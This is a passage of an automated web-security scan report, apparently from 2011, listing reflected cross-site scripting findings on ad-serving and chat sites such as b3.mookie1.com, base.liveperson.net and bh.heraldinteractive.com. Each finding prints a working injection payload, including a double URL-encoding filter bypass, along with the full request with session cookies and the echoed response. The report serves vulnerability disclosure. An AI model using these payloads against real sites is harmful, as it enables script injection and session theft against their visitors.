<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/CollectiveB3/ATTWL/11Q1/MobRON/300/1[timestamp]/1294161343/x90bbb20"><script>alert(1)</script>2288154c82a/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top">
...[SNIP]...

4.197. http://b3.mookie1.com/2/CollectiveB3/ATTWL/11Q1/MobRON/300/1[timestamp]@x90/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/CollectiveB3/ATTWL/11Q1/MobRON/300/1[timestamp]@x90/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1253d"><script>alert(1)</script>f83c851237 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/CollectiveB31253d"><script>alert(1)</script>f83c851237/ATTWL/11Q1/MobRON/300/1[timestamp]@x90/ HTTP/1.1
Host: b3.mookie1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; RMFL=011Pi745U102Og|U106t6; dlx_7d=set; dlx_XXX=set; other_20110126=set; NSC_o4efm_qppm_iuuq=ffffffff09499e2345525d5f4f58455e445a4a423660; dlx_20100929=set; id=914803576615380; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; session=1296256112|1296264723; OAX=rcHW800iZiMAAocf; Dominos=DataXuB3; ATTWL=CollectiveB3;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 05:21:34 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 358
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e9345525d5f4f58455e445a4a423660;path=/

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/CollectiveB31253d"><script>alert(1)</script>f83c851237/ATTWL/11Q1/MobRON/300/1[timestamp]/359802447/x90//default/empty.gif/72634857383030695a694d41416f6366?x" target="_top">
...[SNIP]...

4.198. http://b3.mookie1.com/2/CollectiveB3/ATTWL/11Q1/MobRON/300/1[timestamp]@x90/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/CollectiveB3/ATTWL/11Q1/MobRON/300/1[timestamp]@x90/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3e40f"><script>alert(1)</script>1047b7427bb was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/CollectiveB3/ATTWL3e40f"><script>alert(1)</script>1047b7427bb/11Q1/MobRON/300/1[timestamp]@x90/ HTTP/1.1
Host: b3.mookie1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; RMFL=011Pi745U102Og|U106t6; dlx_7d=set; dlx_XXX=set; other_20110126=set; NSC_o4efm_qppm_iuuq=ffffffff09499e2345525d5f4f58455e445a4a423660; dlx_20100929=set; id=914803576615380; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; session=1296256112|1296264723; OAX=rcHW800iZiMAAocf; Dominos=DataXuB3; ATTWL=CollectiveB3;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 05:21:34 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 360
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e9045525d5f4f58455e445a4a423660;path=/

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/CollectiveB3/ATTWL3e40f"><script>alert(1)</script>1047b7427bb/11Q1/MobRON/300/1[timestamp]/1639352866/x90//default/empty.gif/72634857383030695a694d41416f6366?x" target="_top">
...[SNIP]...

4.199. http://b3.mookie1.com/2/CollectiveB3/ATTWL/11Q1/MobRON/300/1[timestamp]@x90/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/CollectiveB3/ATTWL/11Q1/MobRON/300/1[timestamp]@x90/

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1a24a"><script>alert(1)</script>02370102126 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/CollectiveB3/ATTWL/11Q11a24a"><script>alert(1)</script>02370102126/MobRON/300/1[timestamp]@x90/ HTTP/1.1
Host: b3.mookie1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; RMFL=011Pi745U102Og|U106t6; dlx_7d=set; dlx_XXX=set; other_20110126=set; NSC_o4efm_qppm_iuuq=ffffffff09499e2345525d5f4f58455e445a4a423660; dlx_20100929=set; id=914803576615380; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; session=1296256112|1296264723; OAX=rcHW800iZiMAAocf; Dominos=DataXuB3; ATTWL=CollectiveB3;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 05:21:35 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 360
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e2d45525d5f4f58455e445a4a423660;path=/

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/CollectiveB3/ATTWL/11Q11a24a"><script>alert(1)</script>02370102126/MobRON/300/1[timestamp]/1717528415/x90//default/empty.gif/72634857383030695a694d41416f6366?x" target="_top">
...[SNIP]...

4.200. http://b3.mookie1.com/2/CollectiveB3/ATTWL/11Q1/MobRON/300/1[timestamp]@x90/ [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/CollectiveB3/ATTWL/11Q1/MobRON/300/1[timestamp]@x90/

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d49e8"><script>alert(1)</script>4b4cd2b3892 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/CollectiveB3/ATTWL/11Q1/MobRONd49e8"><script>alert(1)</script>4b4cd2b3892/300/1[timestamp]@x90/ HTTP/1.1
Host: b3.mookie1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; RMFL=011Pi745U102Og|U106t6; dlx_7d=set; dlx_XXX=set; other_20110126=set; NSC_o4efm_qppm_iuuq=ffffffff09499e2345525d5f4f58455e445a4a423660; dlx_20100929=set; id=914803576615380; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; session=1296256112|1296264723; OAX=rcHW800iZiMAAocf; Dominos=DataXuB3; ATTWL=CollectiveB3;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 05:21:36 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 360
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e3f45525d5f4f58455e445a4a423660;path=/

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/CollectiveB3/ATTWL/11Q1/MobRONd49e8"><script>alert(1)</script>4b4cd2b3892/300/1[timestamp]/1950911831/x90//default/empty.gif/72634857383030695a694d41416f6366?x" target="_top">
...[SNIP]...

4.201. http://b3.mookie1.com/2/CollectiveB3/ATTWL/11Q1/MobRON/300/1[timestamp]@x90/ [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/CollectiveB3/ATTWL/11Q1/MobRON/300/1[timestamp]@x90/

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 92e10"><script>alert(1)</script>116c0e64645 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/CollectiveB3/ATTWL/11Q1/MobRON/30092e10"><script>alert(1)</script>116c0e64645/1[timestamp]@x90/ HTTP/1.1
Host: b3.mookie1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; RMFL=011Pi745U102Og|U106t6; dlx_7d=set; dlx_XXX=set; other_20110126=set; NSC_o4efm_qppm_iuuq=ffffffff09499e2345525d5f4f58455e445a4a423660; dlx_20100929=set; id=914803576615380; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; session=1296256112|1296264723; OAX=rcHW800iZiMAAocf; Dominos=DataXuB3; ATTWL=CollectiveB3;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 05:21:37 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 359
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e3f45525d5f4f58455e445a4a423660;path=/

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/CollectiveB3/ATTWL/11Q1/MobRON/30092e10"><script>alert(1)</script>116c0e64645/1[timestamp]/603584026/x90//default/empty.gif/72634857383030695a694d41416f6366?x" target="_top">
...[SNIP]...

4.202. http://b3.mookie1.com/2/CollectiveB3/ATTWL/11Q1/MobRON/300/1[timestamp]@x90/ [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/CollectiveB3/ATTWL/11Q1/MobRON/300/1[timestamp]@x90/

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 427e3"><script>alert(1)</script>c963c08b509 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/CollectiveB3/ATTWL/11Q1/MobRON/300/1[timestamp]@x90427e3"><script>alert(1)</script>c963c08b509/ HTTP/1.1
Host: b3.mookie1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; RMFL=011Pi745U102Og|U106t6; dlx_7d=set; dlx_XXX=set; other_20110126=set; NSC_o4efm_qppm_iuuq=ffffffff09499e2345525d5f4f58455e445a4a423660; dlx_20100929=set; id=914803576615380; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; session=1296256112|1296264723; OAX=rcHW800iZiMAAocf; Dominos=DataXuB3; ATTWL=CollectiveB3;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 05:21:38 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 359
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e5145525d5f4f58455e445a4a423660;path=/

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/CollectiveB3/ATTWL/11Q1/MobRON/300/1[timestamp]/985159134/x90427e3"><script>alert(1)</script>c963c08b509//default/empty.gif/72634857383030695a694d41416f6366?x" target="_top">
...[SNIP]...

4.203. http://base.liveperson.net/hc/5296924/cmd/url/ [page parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://base.liveperson.net
Path:   /hc/5296924/cmd/url/

Issue detail

The value of the page request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 52300"%3balert(1)//e9d6d4317e4 was submitted in the page parameter. This input was echoed as 52300";alert(1)//e9d6d4317e4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /hc/5296924/cmd/url/?site=5296924&SV!click-query-name=chat-seo-campaign1&SV!click-query-room=chat-seo-campaign1&SV!click-query-state=Available&SV!click-query-channel=web&page=http%3A//base.liveperson.net/hc/5296924/%3Fcmd%3Dfile%26file%3DvisitorWantsToChat%26site%3D5296924%26SV%21chat-button-name%3Dchat-seo-campaign1%26SV%21chat-button-room%3Dchat-seo-campaign1%26referrer%3D%28button%2520dynamic-button%3Achat-seo-campaign1%28Live%2520Chat%2520by%2520LivePerson%29%29%2520http%253A//solutions.liveperson.com/live-chat/C1/%253Futm_source%253Dbing%2526utm_medium%253Dcpc%2526utm_keyword%253Dlive%252520chat%2526utm_campaign%253Dchat%252520-us52300"%3balert(1)//e9d6d4317e4&id=4553523208&waitForVisitor=redirectBack&redirectAttempts=10&redirectTimeout=500&&d=1296223648368 HTTP/1.1
Host: base.liveperson.net
Proxy-Connection: keep-alive
Referer: http://solutions.liveperson.com/live-chat/C1/?utm_source=bing&utm_medium=cpc&utm_keyword=live%20chat&utm_campaign=chat%20-us
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=6680227135865200365; LivePersonID=-16101423669632-1296223154:-1:-1:-1:-1; HumanClickSiteContainerID_5296924=Secondary1; LivePersonID=LP i=16101423669632,d=1294435351; ASPSESSIONIDCCQTSCAT=MAKLFIOAFLPGILKCPJFPHGPG; HumanClickACTIVE=1296223153625

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 14:17:40 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 703

<html><body><script language="javascript">function lpRedirectBack() {document.location='/hc/5296924/cmd/url/?site=5296924&page='+escape("http://base.liveperson.net/hc/5296924/?cmd=file&file=visitorWan
...[SNIP]...
n:chat-seo-campaign1(Live%20Chat%20by%20LivePerson))%20http%3A//solutions.liveperson.com/live-chat/C1/%3Futm_source%3Dbing%26utm_medium%3Dcpc%26utm_keyword%3Dlive%2520chat%26utm_campaign%3Dchat%2520-us52300";alert(1)//e9d6d4317e4")+'&waitForVisitor=redirectBack&redirectAttempts=9&d=1296224260533&nreOnly=false';}setTimeout("lpRedirectBack()",500);</script>
...[SNIP]...

4.204. https://base.liveperson.net/hc/5296924/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   https://base.liveperson.net
Path:   /hc/5296924/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bff27%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e8465f0f4edd was submitted in the REST URL parameter 2. This input was echoed as bff27"><script>alert(1)</script>8465f0f4edd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /hc/5296924bff27%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e8465f0f4edd/?cmd=file&file=visitorWantsToTalk&site=5296924&voiceMethod=esc HTTP/1.1
Host: base.liveperson.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: HumanClickKEY=6680227135865200365; LivePersonID=LP i=16101423669632,d=1294435351; LPit=false; HumanClickACTIVE=1296223153625; ASPSESSIONIDCCQTSCAT=MAKLFIOAFLPGILKCPJFPHGPG; HumanClickCHATKEY=3761611791040242971; HumanClickSiteContainerID_5296924=Master;

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 14:16:53 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickSiteContainerID_5296924=Master; path=/hc/5296924
Set-Cookie: LivePersonID=-16101423669632-1296224208:-1:-1:-1:-1; expires=Sat, 28-Jan-2012 14:16:53 GMT; path=/hc/5296924; domain=.liveperson.net
Content-Type: text/html;charset=UTF-8
Last-Modified: Fri, 28 Jan 2011 14:16:53 GMT
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 26922

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="EN" xml:lang="EN">

<head>
<title>
...[SNIP]...
<form id="survey" name="cb" method="get" action="/hc/5296924/5296924bff27"><script>alert(1)</script>8465f0f4edd/">
...[SNIP]...

4.205. https://base.liveperson.net/hc/5296924/ [lpCallId parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://base.liveperson.net
Path:   /hc/5296924/

Issue detail

The value of the lpCallId request parameter is copied into the HTML document as plain text between tags. The payload d57f1<img%20src%3da%20onerror%3dalert(1)>cca1be53e6d was submitted in the lpCallId parameter. This input was echoed as d57f1<img src=a onerror=alert(1)>cca1be53e6d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /hc/5296924/?lpCallId=1296223662870-765d57f1<img%20src%3da%20onerror%3dalert(1)>cca1be53e6d&lpjson=2&cmd=visitorWantsToChat&isOn=true&site=5296924&sessionkey=H6680227135865200365-3761611791040242971K15949386&se=0 HTTP/1.1
Host: base.liveperson.net
Connection: keep-alive
Referer: https://base.liveperson.net/hc/5296924/?cmd=file&file=chatFrame&site=5296924&SV!chat-button-name=chat-seo-campaign1&SV!chat-button-room=chat-seo-campaign1&referrer=(button%20dynamic-button:chat-seo-campaign1(Live%20Chat%20by%20LivePerson))%20http%3A//solutions.liveperson.com/live-chat/C1/%3Futm_source%3Dbing%26utm_medium%3Dcpc%26utm_keyword%3Dlive%2520chat%26utm_campaign%3Dchat%2520-us&SESSIONVAR!skill=Sales&sessionkey=H6680227135865200365-3761611791040242971K15949386
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=6680227135865200365; LivePersonID=-16101423669632-1296223154:-1:-1:-1:-1; HumanClickCHATKEY=3761611791040242971; HumanClickSiteContainerID_5296924=Secondary1; LivePersonID=LP i=16101423669632,d=1294435351; ASPSESSIONIDCCQTSCAT=MAKLFIOAFLPGILKCPJFPHGPG; HumanClickACTIVE=1296223153625

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 14:17:20 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Fri, 28 Jan 2011 14:17:20 GMT
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 143

lpConnLib.Process({"ResultSet": {"lpCallId":"1296223662870-765d57f1<img src=a onerror=alert(1)>cca1be53e6d","lpCallError":"VISITORNOTFOUND"}});

4.206. http://bh.heraldinteractive.com/includes/processAds.bg [companion parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bh.heraldinteractive.com
Path:   /includes/processAds.bg

Issue detail

The value of the companion request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4a165</script><script>alert(1)</script>03c6015ae8f was submitted in the companion parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includes/processAds.bg?position=Top&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom4a165</script><script>alert(1)</script>03c6015ae8f&page=bh.heraldinteractive.com%2Fhome HTTP/1.1
Host: bh.heraldinteractive.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:57:23 GMT
Server: Apache/2.2.4 (Unix) PHP/5.2.0-8+etch11
X-Powered-By: PHP/5.2.0-8+etch11
Content-Length: 2148
Connection: close
Content-Type: text/html


<style type="text/css">
   /* div { top: 0px; } */
</style>


<!--- 1st Section: Delivery Attempt via JX tag. --->
<SCRIPT LANGUAGE="JavaScript1.1" SRC="http://oascentral.bostonherald.com/Rea
...[SNIP]...
CROLLING=no BORDERCOLOR="#000000" '+
'SRC="http://oascentral.bostonherald.com/RealMedia/ads/adstream_sx.ads/bh.heraldinteractive.com/home@Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom4a165</script><script>alert(1)</script>03c6015ae8f!Top">
...[SNIP]...

4.207. http://bh.heraldinteractive.com/includes/processAds.bg [companion parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bh.heraldinteractive.com
Path:   /includes/processAds.bg

Issue detail

The value of the companion request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f614a"><script>alert(1)</script>f5926003640 was submitted in the companion parameter. This input was echoed as f614a\"><script>alert(1)</script>f5926003640 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /includes/processAds.bg?position=Top&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottomf614a"><script>alert(1)</script>f5926003640&page=bh.heraldinteractive.com%2Fhome HTTP/1.1
Host: bh.heraldinteractive.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:57:22 GMT
Server: Apache/2.2.4 (Unix) PHP/5.2.0-8+etch11
X-Powered-By: PHP/5.2.0-8+etch11
Content-Length: 2112
Connection: close
Content-Type: text/html


<style type="text/css">
   /* div { top: 0px; } */
</style>


<!--- 1st Section: Delivery Attempt via JX tag. --->
<SCRIPT LANGUAGE="JavaScript1.1" SRC="http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/home@Top,x14,x15,x16,Middle,Middle1,Middle2,Bottomf614a\"><script>alert(1)</script>f5926003640!Top">
...[SNIP]...

4.208. http://bh.heraldinteractive.com/includes/processAds.bg [page parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bh.heraldinteractive.com
Path:   /includes/processAds.bg

Issue detail

The value of the page request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c2373%2527%253balert%25281%2529%252f%252f4229a2aac7c was submitted in the page parameter. This input was echoed as c2373';alert(1)//4229a2aac7c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of the page request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /includes/processAds.bg?position=Top&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhomec2373%2527%253balert%25281%2529%252f%252f4229a2aac7c HTTP/1.1
Host: bh.heraldinteractive.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:57:23 GMT
Server: Apache/2.2.4 (Unix) PHP/5.2.0-8+etch11
X-Powered-By: PHP/5.2.0-8+etch11
Content-Length: 2016
Connection: close
Content-Type: text/html


<style type="text/css">
   /* div { top: 0px; } */
</style>


<!--- 1st Section: Delivery Attempt via JX tag. --->
<SCRIPT LANGUAGE="JavaScript1.1" SRC="http://oascentral.bostonherald.com/Rea
...[SNIP]...
'HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR="#000000" '+
'SRC="http://oascentral.bostonherald.com/RealMedia/ads/adstream_sx.ads/bh.heraldinteractive.com/homec2373';alert(1)//4229a2aac7c@Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom!Top">
...[SNIP]...

4.209. http://bh.heraldinteractive.com/includes/processAds.bg [page parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bh.heraldinteractive.com
Path:   /includes/processAds.bg

Issue detail

The value of the page request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 42c4a"><script>alert(1)</script>4b0e292800b was submitted in the page parameter. This input was echoed as 42c4a\"><script>alert(1)</script>4b0e292800b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /includes/processAds.bg?position=Top&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome42c4a"><script>alert(1)</script>4b0e292800b HTTP/1.1
Host: bh.heraldinteractive.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:57:23 GMT
Server: Apache/2.2.4 (Unix) PHP/5.2.0-8+etch11
X-Powered-By: PHP/5.2.0-8+etch11
Content-Length: 2112
